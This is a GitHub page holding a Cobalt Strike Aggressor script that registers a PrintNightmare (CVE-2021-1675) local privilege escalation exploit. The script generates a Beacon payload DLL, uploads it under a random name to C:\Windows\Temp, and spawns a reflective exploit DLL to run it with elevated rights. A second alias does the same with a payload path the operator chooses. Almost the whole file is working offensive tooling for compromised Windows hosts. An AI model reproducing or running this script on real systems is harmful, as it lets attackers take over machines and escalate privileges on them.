-
Notifications
You must be signed in to change notification settings - Fork 26
/
PrintNightMareLpe.cna
43 lines (41 loc) · 1.87 KB
/
PrintNightMareLpe.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
sub print_night_mare_lpe {
local('$arch $dll $temp');
btask($1, "Tasked Beacon to execute" . listener_describe($2) . " via cve-2021-1675", "T1068");
$name = rand(@("kernel", "base", "detectme")) . rand(100) . ".dll";
$temp = "c:\\Windows\\Temp\\".$name;
if(-is64 $1){
$arch = "x64";
$dll = getFileProper(script_resource("module"), "LPE_Reflect_Elevate.x64.dll");
$dlldata = artifact_payload($2, "dll", $arch);
bupload_raw!($1, $temp, $dlldata);
blog($1, "stageless uploading to: $temp");
bdllspawn!($1, $dll, $temp, "Local Privilege Escalation of CVE-2021-1675", 5000, true);
}
else{
#$arch = "x86";
#$dll = getFileProper(script_resource("module"), "LPE_Reflect_Demo.dll");
#$dlldata = artifact_payload($2, "dll", $arch);
#bupload_raw!($1, $temp, $dlldata);
#blog($1, "stageless uploading to: $temp");
#bdllspawn!($1, $dll, $temp, "Local Privilege Escalation of CVE-2021-1675", 5000, true);
berror($1, "\c4Unspoort window version(only 64)!");
}
}
beacon_exploit_register("PrintNightMare-1675", "PrintNightMare Privilege Escalation (CVE-2021-1675)", &print_night_mare_lpe);
alias print_night_mare_lpe {
local('$arch $dll');
blog($1,"=====================================")
blog($1, "\c9PrightNightMare LPE\o (\c0\UCVE-2021-1675\U\o) \c9Running\o");
blog($1, "\c0payloadDLLPath\o: \cB$2\o");
# judge 64 bit or 32 bit
if (-is64 $1){
$arch = "x64";
$dll = getFileProper(script_resource("module"), "CVE-2021-1675.x64.dll");
bdllspawn($1, $dll, $2, "Local Privilege Escalation of CVE-2021-1675", 5000, true);
}
else{
$arch = "x86";
$dll = getFileProper(script_resource("module"), "CVE-2021-1675.x86.dll");
bdllspawn($1, $dll, $2, "Local Privilege Escalation of CVE-2021-1675", 5000, true);
}
}